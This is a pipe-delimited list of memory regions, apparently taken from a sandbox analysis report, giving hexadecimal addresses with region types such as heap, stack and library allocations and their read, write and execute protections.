||
|
2351000
|
trusted library allocation
|
page read and write
|
||
|
22BF000
|
stack
|
page read and write
|
||
|
438000
|
heap
|
page read and write
|
||
|
1AA9E000
|
stack
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3360000
|
trusted library allocation
|
page read and write
|
||
|
596000
|
heap
|
page read and write
|
||
|
598E000
|
heap
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A6D000
|
heap
|
page read and write
|
||
|
21D1000
|
trusted library allocation
|
page read and write
|
||
|
C8000
|
heap
|
page read and write
|
||
|
570A000
|
heap
|
page read and write
|
||
|
6050000
|
trusted library allocation
|
page read and write
|
||
|
3090000
|
remote allocation
|
page read and write
|
||
|
2A2B000
|
trusted library allocation
|
page read and write
|
||
|
59C4000
|
heap
|
page read and write
|
||
|
12140000
|
trusted library allocation
|
page read and write
|
||
|
4C3E000
|
heap
|
page read and write
|
||
|
5415000
|
heap
|
page read and write
|
||
|
2A5A000
|
trusted library allocation
|
page read and write
|
||
|
399000
|
heap
|
page read and write
|
||
|
54F9000
|
heap
|
page read and write
|
||
|
44A000
|
heap
|
page read and write
|
||
|
550D000
|
heap
|
page read and write
|
||
|
5C55000
|
heap
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
2FE000
|
heap
|
page read and write
|
||
|
1B0EF000
|
stack
|
page read and write
|
||
|
1C0D4000
|
heap
|
page read and write
|
||
|
3E0000
|
heap
|
page read and write
|
||
|
7FE89C50000
|
trusted library allocation
|
page read and write
|
||
|
367F000
|
trusted library allocation
|
page read and write
|
||
|
5ABC000
|
heap
|
page read and write
|
||
|
4C31000
|
heap
|
page read and write
|
||
|
456000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
33E5000
|
trusted library allocation
|
page read and write
|
||
|
2551000
|
trusted library allocation
|
page read and write
|
||
|
23DC000
|
heap
|
page read and write
|
||
|
456000
|
heap
|
page read and write
|
||
|
129000
|
heap
|
page read and write
|
||
|
119000
|
heap
|
page read and write
|
||
|
3B15000
|
trusted library allocation
|
page read and write
|
||
|
26F5000
|
heap
|
page read and write
|
||
|
398C000
|
stack
|
page read and write
|
||
|
3EE5000
|
heap
|
page read and write
|
||
|
495000
|
heap
|
page read and write
|
||
|
5B10000
|
heap
|
page read and write
|
||
|
3C7000
|
heap
|
page read and write
|
||
|
5800000
|
trusted library allocation
|
page read and write
|
||
|
20C4000
|
heap
|
page execute and read and write
|
||
|
5ED000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
59C5000
|
heap
|
page read and write
|
||
|
1EA0000
|
heap
|
page read and write
|
||
|
364B000
|
stack
|
page read and write
|
||
|
383E000
|
stack
|
page read and write
|
||
|
4093000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2A21000
|
trusted library allocation
|
page read and write
|
||
|
54F9000
|
heap
|
page read and write
|
||
|
37F000
|
trusted library allocation
|
page read and write
|
||
|
409000
|
heap
|
page read and write
|
||
|
5D2C000
|
heap
|
page read and write
|
||
|
542A000
|
heap
|
page read and write
|
||
|
18B000
|
heap
|
page read and write
|
||
|
5C9D000
|
heap
|
page read and write
|
||
|
3F6000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
1C368000
|
heap
|
page read and write
|
||
|
3E92000
|
heap
|
page read and write
|
||
|
1DC0000
|
direct allocation
|
page read and write
|
||
|
23DC000
|
heap
|
page read and write
|
||
|
455000
|
heap
|
page read and write
|
||
|
1DF3000
|
direct allocation
|
page read and write
|
||
|
2391000
|
heap
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
59CB000
|
heap
|
page read and write
|
||
|
2C9000
|
heap
|
page read and write
|
||
|
3A21000
|
heap
|
page read and write
|
||
|
1C39E000
|
stack
|
page read and write
|
||
|
2A2D000
|
trusted library allocation
|
page read and write
|
||
|
428F000
|
stack
|
page read and write
|
||
|
57F8000
|
heap
|
page read and write
|
||
|
4C26000
|
heap
|
page read and write
|
||
|
5A9A000
|
heap
|
page read and write
|
||
|
DA000
|
heap
|
page read and write
|
||
|
2E50000
|
heap
|
page read and write
|
||
|
5415000
|
heap
|
page read and write
|
||
|
4650000
|
trusted library allocation
|
page read and write
|
||
|
1A87F000
|
stack
|
page read and write
|
||
|
5E4000
|
heap
|
page read and write
|
||
|
38F000
|
direct allocation
|
page read and write
|
||
|
5ACC000
|
heap
|
page read and write
|
||
|
3EE7000
|
heap
|
page read and write
|
||
|
597C000
|
heap
|
page read and write
|
||
|
5ADD000
|
heap
|
page read and write
|
||
|
2497000
|
trusted library allocation
|
page read and write
|
||
|
3F2F000
|
heap
|
page read and write
|
||
|
2A4E000
|
trusted library allocation
|
page read and write
|
||
|
39C2000
|
heap
|
page read and write
|
||
|
500000
|
direct allocation
|
page read and write
|
||
|
1C340000
|
heap
|
page read and write
|
||
|
43A000
|
heap
|
page read and write
|
||
|
7FE89C60000
|
trusted library allocation
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
4C44000
|
heap
|
page read and write
|
||
|
5ACC000
|
heap
|
page read and write
|
||
|
1B2EE000
|
stack
|
page read and write
|
||
|
54FE000
|
heap
|
page read and write
|
||
|
40C000
|
heap
|
page read and write
|
||
|
461000
|
heap
|
page read and write
|
||
|
44C000
|
heap
|
page read and write
|
||
|
1C58E000
|
stack
|
page read and write
|
||
|
2436000
|
heap
|
page read and write
|
||
|
54E4000
|
heap
|
page read and write
|
||
|
3E92000
|
heap
|
page read and write
|
||
|
125000
|
heap
|
page read and write
|
||
|
7FE899F6000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F28000
|
trusted library allocation
|
page read and write
|
||
|
13A000
|
heap
|
page read and write
|
||
|
2A5E000
|
trusted library allocation
|
page read and write
|
||
|
54FB000
|
heap
|
page read and write
|
||
|
49B000
|
direct allocation
|
page read and write
|
||
|
299000
|
heap
|
page read and write
|
||
|
34DD000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
heap
|
page read and write
|
||
|
5383000
|
heap
|
page read and write
|
||
|
4120000
|
trusted library allocation
|
page read and write
|
||
|
3E70000
|
heap
|
page read and write
|
||
|
14D000
|
heap
|
page read and write
|
||
|
384000
|
heap
|
page read and write
|
||
|
5950000
|
heap
|
page read and write
|
||
|
3AB000
|
heap
|
page read and write
|
||
|
5D99000
|
heap
|
page read and write
|
||
|
3F60000
|
heap
|
page read and write
|
||
|
3644000
|
heap
|
page read and write
|
||
|
5311000
|
heap
|
page read and write
|
||
|
23E4000
|
heap
|
page read and write
|
||
|
5971000
|
heap
|
page read and write
|
||
|
2D0000
|
heap
|
page read and write
|
||
|
4E55000
|
heap
|
page read and write
|
||
|
7FE89AF2000
|
trusted library allocation
|
page read and write
|
||
|
1A6EE000
|
stack
|
page read and write
|
||
|
2A5D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
23C7000
|
heap
|
page read and write
|
||
|
5A9E000
|
heap
|
page read and write
|
||
|
3BF000
|
heap
|
page read and write
|
||
|
381F000
|
stack
|
page read and write
|
||
|
7FE8992B000
|
trusted library allocation
|
page read and write
|
||
|
5992000
|
heap
|
page read and write
|
||
|
1C07C000
|
heap
|
page read and write
|
||
|
200F000
|
stack
|
page read and write
|
||
|
1C070000
|
heap
|
page read and write
|
||
|
5CB0000
|
heap
|
page read and write
|
||
|
33E5000
|
trusted library allocation
|
page read and write
|
||
|
390000
|
direct allocation
|
page read and write
|
||
|
486000
|
heap
|
page read and write
|
||
|
5BA8000
|
trusted library allocation
|
page read and write
|
||
|
40BF000
|
trusted library allocation
|
page read and write
|
||
|
37A0000
|
trusted library allocation
|
page read and write
|
||
|
3470000
|
trusted library allocation
|
page read and write
|
||
|
38E000
|
heap
|
page read and write
|
||
|
7FE89A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
43E0000
|
trusted library allocation
|
page read and write
|
||
|
169000
|
heap
|
page read and write
|
||
|
3674000
|
trusted library allocation
|
page read and write
|
||
|
38D0000
|
heap
|
page read and write
|
||
|
550D000
|
heap
|
page read and write
|
||
|
3F25000
|
heap
|
page read and write
|
||
|
34F8000
|
trusted library allocation
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
2C9000
|
heap
|
page read and write
|
||
|
4C2C000
|
heap
|
page read and write
|
||
|
4DD000
|
heap
|
page read and write
|
||
|
2A4A000
|
trusted library allocation
|
page read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
1A700000
|
heap
|
page read and write
|
||
|
3CE0000
|
heap
|
page read and write
|
||
|
E1000
|
heap
|
page read and write
|
||
|
3E1000
|
heap
|
page read and write
|
||
|
3A40000
|
heap
|
page read and write
|
||
|
3F3000
|
heap
|
page read and write
|
||
|
4C44000
|
heap
|
page read and write
|
||
|
570D000
|
heap
|
page read and write
|
||
|
402000
|
heap
|
page read and write
|
||
|
414000
|
heap
|
page read and write
|
||
|
5F9000
|
heap
|
page read and write
|
||
|
1AC6D000
|
heap
|
page read and write
|
||
|
2A6000
|
heap
|
page read and write
|
||
|
1DA0000
|
heap
|
page read and write
|
||
|
AF000
|
heap
|
page read and write
|
||
|
3E6000
|
heap
|
page read and write
|
||
|
1A620000
|
heap
|
page execute and read and write
|
||
|
3A36000
|
heap
|
page read and write
|
||
|
1D60000
|
trusted library allocation
|
page read and write
|
||
|
5690000
|
heap
|
page read and write
|
||
|
3F62000
|
heap
|
page read and write
|
||
|
5477000
|
heap
|
page read and write
|
||
|
3F3000
|
heap
|
page read and write
|
||
|
37B4000
|
heap
|
page read and write
|
||
|
43F000
|
stack
|
page read and write
|
||
|
40BD000
|
trusted library allocation
|
page read and write
|
||
|
D0000
|
heap
|
page read and write
|
||
|
46A000
|
heap
|
page read and write
|
||
|
598E000
|
heap
|
page read and write
|
||
|
33E5000
|
trusted library allocation
|
page read and write
|
||
|
2A48000
|
trusted library allocation
|
page read and write
|
||
|
39D3000
|
heap
|
page read and write
|
||
|
EC000
|
heap
|
page read and write
|
||
|
1D90000
|
trusted library allocation
|
page read and write
|
||
|
9E000
|
heap
|
page read and write
|
||
|
2A5D000
|
trusted library allocation
|
page read and write
|
||
|
4C26000
|
heap
|
page read and write
|
||
|
1D54000
|
heap
|
page read and write
|
||
|
17C000
|
heap
|
page read and write
|
||
|
364B000
|
heap
|
page read and write
|
||
|
1E50000
|
heap
|
page read and write
|
||
|
3C4000
|
heap
|
page read and write
|
||
|
2A30000
|
trusted library allocation
|
page read and write
|
||
|
5424000
|
heap
|
page read and write
|
||
|
4E0000
|
direct allocation
|
page read and write
|
||
|
1FA6000
|
heap
|
page read and write
|
||
|
1B340000
|
heap
|
page read and write
|
||
|
1A5C8000
|
stack
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
3D1000
|
heap
|
page read and write
|
||
|
67000
|
heap
|
page read and write
|
||
|
361A000
|
stack
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
1A6A7000
|
heap
|
page read and write
|
||
|
441000
|
heap
|
page read and write
|
||
|
2A10000
|
remote allocation
|
page read and write
|
||
|
2C4000
|
heap
|
page read and write
|
||
|
3FC000
|
heap
|
page read and write
|
||
|
4805000
|
heap
|
page read and write
|
||
|
4C2C000
|
heap
|
page read and write
|
||
|
550F000
|
heap
|
page read and write
|
||
|
4C3E000
|
heap
|
page read and write
|
||
|
1C96000
|
heap
|
page read and write
|
||
|
F8000
|
heap
|
page read and write
|
||
|
16D000
|
heap
|
page read and write
|
||
|
53C5000
|
heap
|
page read and write
|
||
|
2C8000
|
heap
|
page read and write
|
||
|
33D9000
|
trusted library allocation
|
page read and write
|
||
|
286000
|
heap
|
page read and write
|
||
|
620000
|
direct allocation
|
page read and write
|
||
|
437000
|
heap
|
page read and write
|
||
|
2FB000
|
heap
|
page read and write
|
||
|
5929000
|
heap
|
page read and write
|
||
|
3E2E000
|
stack
|
page read and write
|
||
|
398D000
|
stack
|
page read and write
|
||
|
4C44000
|
heap
|
page read and write
|
||
|
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
|
3660000
|
trusted library allocation
|
page read and write
|
||
|
404000
|
heap
|
page read and write
|
||
|
FE000
|
heap
|
page read and write
|
||
|
5651000
|
heap
|
page read and write
|
||
|
54FE000
|
heap
|
page read and write
|
||
|
4C6000
|
heap
|
page read and write
|
||
|
7FE89C50000
|
trusted library allocation
|
page read and write
|
||
|
116000
|
heap
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
3643000
|
trusted library allocation
|
page read and write
|
||
|
2444000
|
heap
|
page execute and read and write
|
||
|
EC000
|
heap
|
page read and write
|
||
|
540E000
|
heap
|
page read and write
|
||
|
1C381000
|
heap
|
page read and write
|
||
|
2A32000
|
trusted library allocation
|
page read and write
|
||
|
281000
|
stack
|
page read and write
|
||
|
405000
|
heap
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
4C2C000
|
heap
|
page read and write
|
||
|
F4000
|
heap
|
page read and write
|
||
|
121D1000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
350000
|
trusted library allocation
|
page read and write
|
||
|
7FE899C6000
|
trusted library allocation
|
page read and write
|
||
|
149000
|
heap
|
page read and write
|
||
|
1A94E000
|
stack
|
page read and write
|
||
|
3DA8000
|
trusted library allocation
|
page read and write
|
||
|
E3000
|
heap
|
page read and write
|
||
|
1A65E000
|
heap
|
page execute and read and write
|
||
|
2A5A000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AC3000
|
trusted library allocation
|
page read and write
|
||
|
444000
|
heap
|
page read and write
|
||
|
3BF000
|
heap
|
page read and write
|
||
|
5470000
|
heap
|
page read and write
|
||
|
153000
|
heap
|
page read and write
|
||
|
79000
|
heap
|
page read and write
|
||
|
542A000
|
heap
|
page read and write
|
||
|
4C38000
|
heap
|
page read and write
|
||
|
15C000
|
heap
|
page read and write
|
||
|
5477000
|
heap
|
page read and write
|
||
|
59C9000
|
heap
|
page read and write
|
||
|
CD000
|
heap
|
page read and write
|
||
|
4C4E000
|
heap
|
page read and write
|
||
|
3530000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C20000
|
trusted library allocation
|
page read and write
|
||
|
5311000
|
heap
|
page read and write
|
||
|
41B000
|
heap
|
page read and write
|
||
|
1C5DF000
|
stack
|
page read and write
|
||
|
2B0000
|
trusted library allocation
|
page read and write
|
||
|
2131000
|
trusted library allocation
|
page read and write
|
||
|
370000
|
trusted library allocation
|
page read and write
|
||
|
5705000
|
heap
|
page read and write
|
||
|
129000
|
heap
|
page read and write
|
||
|
1A6A0000
|
heap
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
3D9000
|
heap
|
page read and write
|
||
|
4C3A000
|
heap
|
page read and write
|
||
|
5F4000
|
heap
|
page read and write
|
||
|
2A2D000
|
trusted library allocation
|
page read and write
|
||
|
2A50000
|
trusted library allocation
|
page read and write
|
||
|
1AC5D000
|
heap
|
page read and write
|
||
|
2A32000
|
trusted library allocation
|
page read and write
|
||
|
5AC8000
|
heap
|
page read and write
|
||
|
4B1C000
|
heap
|
page read and write
|
||
|
33E5000
|
trusted library allocation
|
page read and write
|
||
|
2A27000
|
trusted library allocation
|
page read and write
|
||
|
1DA0000
|
direct allocation
|
page read and write
|
||
|
3BB0000
|
trusted library allocation
|
page read and write
|
||
|
1A6F0000
|
heap
|
page read and write
|
||
|
428000
|
heap
|
page read and write
|
||
|
303000
|
heap
|
page read and write
|
||
|
2A2000
|
heap
|
page read and write
|
||
|
3A80000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
4C47000
|
heap
|
page read and write
|
||
|
153000
|
heap
|
page read and write
|
||
|
7FE899CC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B3C0000
|
heap
|
page read and write
|
||
|
E8000
|
heap
|
page read and write
|
||
|
404000
|
heap
|
page read and write
|
||
|
305000
|
stack
|
page read and write
|
||
|
3030000
|
trusted library allocation
|
page execute
|
||
|
4C38000
|
heap
|
page read and write
|
||
|
442000
|
heap
|
page read and write
|
||
|
6FA8000
|
trusted library allocation
|
page read and write
|
||
|
340000
|
heap
|
page read and write
|
||
|
3EC3000
|
heap
|
page read and write
|
||
|
5501000
|
heap
|
page read and write
|
||
|
4C49000
|
heap
|
page read and write
|
||
|
59C9000
|
heap
|
page read and write
|
||
|
155000
|
heap
|
page read and write
|
||
|
43B000
|
heap
|
page read and write
|
||
|
5CC1000
|
heap
|
page read and write
|
||
|
1D50000
|
heap
|
page read and write
|
||
|
4B3000
|
heap
|
page read and write
|
||
|
46C000
|
heap
|
page read and write
|
||
|
5C9C000
|
heap
|
page read and write
|
||
|
4E59000
|
heap
|
page read and write
|
||
|
4C3A000
|
heap
|
page read and write
|
||
|
438000
|
heap
|
page read and write
|
||
|
4A0000
|
direct allocation
|
page read and write
|
||
|
42F000
|
heap
|
page read and write
|
||
|
57F9000
|
heap
|
page read and write
|
||
|
23E9000
|
heap
|
page read and write
|
||
|
5988000
|
heap
|
page read and write
|
||
|
34F5000
|
trusted library allocation
|
page read and write
|
||
|
43A000
|
heap
|
page read and write
|
||
|
1B53C000
|
stack
|
page read and write
|
||
|
40B4000
|
trusted library allocation
|
page read and write
|
||
|
433000
|
heap
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
209C000
|
stack
|
page read and write
|
||
|
1C0D1000
|
heap
|
page read and write
|
||
|
B10000
|
heap
|
page read and write
|
||
|
2C9000
|
heap
|
page read and write
|
||
|
2340000
|
heap
|
page read and write
|
||
|
2728000
|
trusted library allocation
|
page read and write
|
||
|
6050000
|
trusted library allocation
|
page read and write
|
||
|
541A000
|
heap
|
page read and write
|
||
|
BE000
|
heap
|
page read and write
|
||
|
3F2000
|
heap
|
page read and write
|
||
|
30E000
|
heap
|
page read and write
|
||
|
5426000
|
heap
|
page read and write
|
||
|
1C7FE000
|
stack
|
page read and write
|
||
|
30F000
|
heap
|
page read and write
|
||
|
363E000
|
heap
|
page read and write
|
||
|
1B580000
|
heap
|
page read and write
|
||
|
600000
|
direct allocation
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
12C000
|
heap
|
page read and write
|
||
|
432000
|
heap
|
page read and write
|
||
|
27B000
|
stack
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
3EFB000
|
heap
|
page read and write
|
||
|
1B036000
|
heap
|
page read and write
|
||
|
5AC8000
|
heap
|
page read and write
|
||
|
39C5000
|
heap
|
page read and write
|
||
|
3BF0000
|
trusted library allocation
|
page read and write
|
||
|
2A5D000
|
trusted library allocation
|
page read and write
|
||
|
3BF0000
|
trusted library allocation
|
page read and write
|
||
|
3A11000
|
heap
|
page read and write
|
||
|
1AFFF000
|
stack
|
page read and write
|
||
|
116000
|
heap
|
page read and write
|
||
|
465000
|
heap
|
page read and write
|
||
|
5AA7000
|
heap
|
page read and write
|
||
|
399C000
|
heap
|
page read and write
|
||
|
34DB000
|
trusted library allocation
|
page read and write
|
||
|
365B000
|
trusted library allocation
|
page read and write
|
||
|
4B1C000
|
heap
|
page read and write
|
||
|
1A777000
|
heap
|
page read and write
|
||
|
1AC7A000
|
heap
|
page read and write
|
||
|
3A33000
|
heap
|
page read and write
|
||
|
5477000
|
heap
|
page read and write
|
||
|
1FAF000
|
stack
|
page read and write
|
||
|
3BE000
|
heap
|
page read and write
|
||
|
1FF0000
|
heap
|
page read and write
|
||
|
330000
|
direct allocation
|
page read and write
|
||
|
3A87000
|
heap
|
page read and write
|
||
|
33D9000
|
trusted library allocation
|
page read and write
|
||
|
2A80000
|
trusted library allocation
|
page read and write
|
||
|
3641000
|
heap
|
page read and write
|
||
|
39C7000
|
heap
|
page read and write
|
||
|
7FE89914000
|
trusted library allocation
|
page read and write
|
||
|
2A83000
|
trusted library allocation
|
page read and write
|
||
|
20B0000
|
heap
|
page execute and read and write
|
||
|
98000
|
heap
|
page read and write
|
||
|
54FE000
|
heap
|
page read and write
|
||
|
3B10000
|
trusted library allocation
|
page read and write
|
||
|
2A2E000
|
trusted library allocation
|
page read and write
|
||
|
4C22000
|
heap
|
page read and write
|
||
|
D4000
|
heap
|
page read and write
|
||
|
7FE89C10000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
E0000
|
heap
|
page read and write
|
||
|
256C000
|
trusted library allocation
|
page read and write
|
||
|
5704000
|
heap
|
page read and write
|
||
|
90000
|
heap
|
page read and write
|
||
|
2D40000
|
heap
|
page read and write
|
||
|
5988000
|
heap
|
page read and write
|
||
|
1ACFC000
|
heap
|
page read and write
|
||
|
5A9E000
|
heap
|
page read and write
|
||
|
79A8000
|
trusted library allocation
|
page read and write
|
||
|
3D1000
|
heap
|
page read and write
|
||
|
5986000
|
heap
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
1B7C0000
|
heap
|
page read and write
|
||
|
2CB000
|
heap
|
page read and write
|
||
|
1AC30000
|
heap
|
page read and write
|
||
|
2A10000
|
remote allocation
|
page read and write
|
||
|
6A0000
|
heap
|
page read and write
|
||
|
4BF000
|
heap
|
page read and write
|
||
|
2D0000
|
trusted library allocation
|
page read and write
|
||
|
2D20000
|
trusted library allocation
|
page execute read
|
||
|
2CB000
|
heap
|
page read and write
|
||
|
1B22F000
|
stack
|
page read and write
|
||
|
3ED000
|
heap
|
page read and write
|
||
|
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
|
550A000
|
heap
|
page read and write
|
||
|
39D3000
|
heap
|
page read and write
|
||
|
2A45000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B18000
|
trusted library allocation
|
page read and write
|
||
|
560000
|
heap
|
page read and write
|
||
|
5310000
|
heap
|
page read and write
|
||
|
33A8000
|
trusted library allocation
|
page read and write
|
||
|
520000
|
direct allocation
|
page read and write
|
||
|
2A32000
|
trusted library allocation
|
page read and write
|
||
|
54ED000
|
heap
|
page read and write
|
||
|
4809000
|
heap
|
page read and write
|
||
|
1AED6000
|
heap
|
page read and write
|
||
|
2A54000
|
trusted library allocation
|
page read and write
|
||
|
3E9000
|
heap
|
page read and write
|
||
|
2C4000
|
heap
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page execute and read and write
|
||
|
160000
|
heap
|
page read and write
|
||
|
5C78000
|
heap
|
page read and write
|
||
|
30B000
|
heap
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
540D000
|
heap
|
page read and write
|
||
|
3EC3000
|
heap
|
page read and write
|
||
|
4C3A000
|
heap
|
page read and write
|
||
|
1C67B000
|
stack
|
page read and write
|
||
|
5850000
|
heap
|
page read and write
|
||
|
231F000
|
stack
|
page read and write
|
||
|
26F0000
|
heap
|
page read and write
|
||
|
5428000
|
heap
|
page read and write
|
||
|
3A11000
|
heap
|
page read and write
|
||
|
550A000
|
heap
|
page read and write
|
||
|
3E8000
|
heap
|
page read and write
|
||
|
1B099000
|
heap
|
page read and write
|
||
|
2A52000
|
trusted library allocation
|
page read and write
|
||
|
23E0000
|
heap
|
page read and write
|
||
|
3C9000
|
heap
|
page read and write
|
||
|
5CB4000
|
heap
|
page read and write
|
||
|
23DB000
|
heap
|
page read and write
|
||
|
1A6F9000
|
heap
|
page read and write
|
||
|
1C690000
|
heap
|
page read and write
|
||
|
3CEF000
|
stack
|
page read and write
|
||
|
47F000
|
heap
|
page read and write
|
||
|
7FE899D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
419000
|
heap
|
page read and write
|
||
|
476000
|
remote allocation
|
page execute and read and write
|
||
|
3600000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2A5A000
|
trusted library allocation
|
page read and write
|
||
|
467000
|
heap
|
page read and write
|
||
|
278000
|
stack
|
page read and write
|
||
|
1AC55000
|
heap
|
page read and write
|
||
|
3DA000
|
heap
|
page read and write
|
||
|
30E000
|
heap
|
page read and write
|
||
|
5709000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
2A9D000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AC7000
|
trusted library allocation
|
page read and write
|
||
|
4C43000
|
heap
|
page read and write
|
||
|
1AF7B000
|
stack
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
29A8000
|
trusted library allocation
|
page read and write
|
||
|
20C8000
|
heap
|
page execute and read and write
|
||
|
17C000
|
heap
|
page read and write
|
||
|
149000
|
heap
|
page read and write
|
||
|
16D000
|
heap
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
30D000
|
heap
|
page read and write
|
||
|
2A2F000
|
trusted library allocation
|
page read and write
|
||
|
2996000
|
trusted library allocation
|
page read and write
|
||
|
5CA8000
|
heap
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
33A0000
|
trusted library allocation
|
page read and write
|
||
|
5E0000
|
direct allocation
|
page read and write
|
||
|
4C2A000
|
heap
|
page read and write
|
||
|
43A000
|
heap
|
page read and write
|
||
|
33D9000
|
trusted library allocation
|
page read and write
|
||
|
59C9000
|
heap
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BF6B000
|
heap
|
page read and write
|
||
|
2C9000
|
heap
|
page read and write
|
||
|
3F27000
|
heap
|
page read and write
|
||
|
12201000
|
trusted library allocation
|
page read and write
|
||
|
2D45000
|
heap
|
page read and write
|
||
|
5CB0000
|
heap
|
page read and write
|
||
|
3B8000
|
heap
|
page read and write
|
||
|
5928000
|
trusted library allocation
|
page read and write
|
||
|
2A83000
|
trusted library allocation
|
page read and write
|
||
|
1C36B000
|
heap
|
page read and write
|
||
|
380000
|
heap
|
page read and write
|
||
|
34D000
|
heap
|
page read and write
|
||
|
3A4000
|
heap
|
page read and write
|
||
|
3DF000
|
heap
|
page read and write
|
||
|
26F1000
|
trusted library allocation
|
page read and write
|
||
|
1AF0000
|
heap
|
page read and write
|
||
|
4F6000
|
heap
|
page read and write
|
||
|
3EB000
|
heap
|
page read and write
|
||
|
33F0000
|
heap
|
page read and write
|
||
|
33E5000
|
trusted library allocation
|
page read and write
|
||
|
229F000
|
stack
|
page read and write
|
||
|
1C8AF000
|
stack
|
page read and write
|
||
|
1ACC2000
|
heap
|
page read and write
|
||
|
3A22000
|
heap
|
page read and write
|
||
|
3EE5000
|
heap
|
page read and write
|
||
|
5470000
|
heap
|
page read and write
|
||
|
409000
|
heap
|
page read and write
|
||
|
1C10000
|
trusted library allocation
|
page read and write
|
||
|
3657000
|
heap
|
page read and write
|
||
|
53C4000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3F2F000
|
heap
|
page read and write
|
||
|
541E000
|
heap
|
page read and write
|
||
|
2B0000
|
heap
|
page read and write
|
||
|
3890000
|
trusted library allocation
|
page read and write
|
||
|
3A34000
|
heap
|
page read and write
|
||
|
1CB5E000
|
stack
|
page read and write
|
||
|
42C000
|
heap
|
page read and write
|
||
|
23E4000
|
heap
|
page read and write
|
||
|
1ABD8000
|
stack
|
page read and write
|
||
|
33D9000
|
trusted library allocation
|
page read and write
|
||
|
44A000
|
heap
|
page read and write
|
||
|
12F000
|
heap
|
page read and write
|
||
|
2A27000
|
trusted library allocation
|
page read and write
|
||
|
1DA0000
|
heap
|
page read and write
|
||
|
1CF0000
|
heap
|
page read and write
|
||
|
6A4000
|
heap
|
page read and write
|
||
|
4B11000
|
heap
|
page read and write
|
||
|
59CA000
|
heap
|
page read and write
|
||
|
541E000
|
heap
|
page read and write
|
||
|
1B36E000
|
stack
|
page read and write
|
||
|
2A32000
|
trusted library allocation
|
page read and write
|
||
|
7FE89C30000
|
trusted library allocation
|
page read and write
|
||
|
2400000
|
heap
|
page read and write
|
||
|
2A5D000
|
trusted library allocation
|
page read and write
|
||
|
1DE7000
|
direct allocation
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
25EF000
|
stack
|
page read and write
|
||
|
2A5A000
|
trusted library allocation
|
page read and write
|
||
|
4C41000
|
heap
|
page read and write
|
||
|
3EE7000
|
heap
|
page read and write
|
||
|
1EF0000
|
heap
|
page read and write
|
||
|
5ACC000
|
heap
|
page read and write
|
||
|
541A000
|
heap
|
page read and write
|
||
|
4C4E000
|
heap
|
page read and write
|
||
|
4C0000
|
direct allocation
|
page read and write
|
||
|
550000
|
heap
|
page read and write
|
||
|
7FE89AC7000
|
trusted library allocation
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
E0000
|
heap
|
page read and write
|
||
|
4090000
|
trusted library allocation
|
page read and write
|
||
|
34EE000
|
trusted library allocation
|
page read and write
|
||
|
4650000
|
heap
|
page read and write
|
||
|
59C4000
|
heap
|
page read and write
|
||
|
2CE000
|
heap
|
page read and write
|
||
|
4C3E000
|
heap
|
page read and write
|
||
|
442000
|
heap
|
page read and write
|
||
|
2A32000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CE0000
|
heap
|
page execute and read and write
|
||
|
80000
|
heap
|
page read and write
|
||
|
3E0000
|
heap
|
page read and write
|
||
|
380000
|
heap
|
page read and write
|
||
|
7FE89C40000
|
trusted library allocation
|
page read and write
|
||
|
39C7000
|
heap
|
page read and write
|
||
|
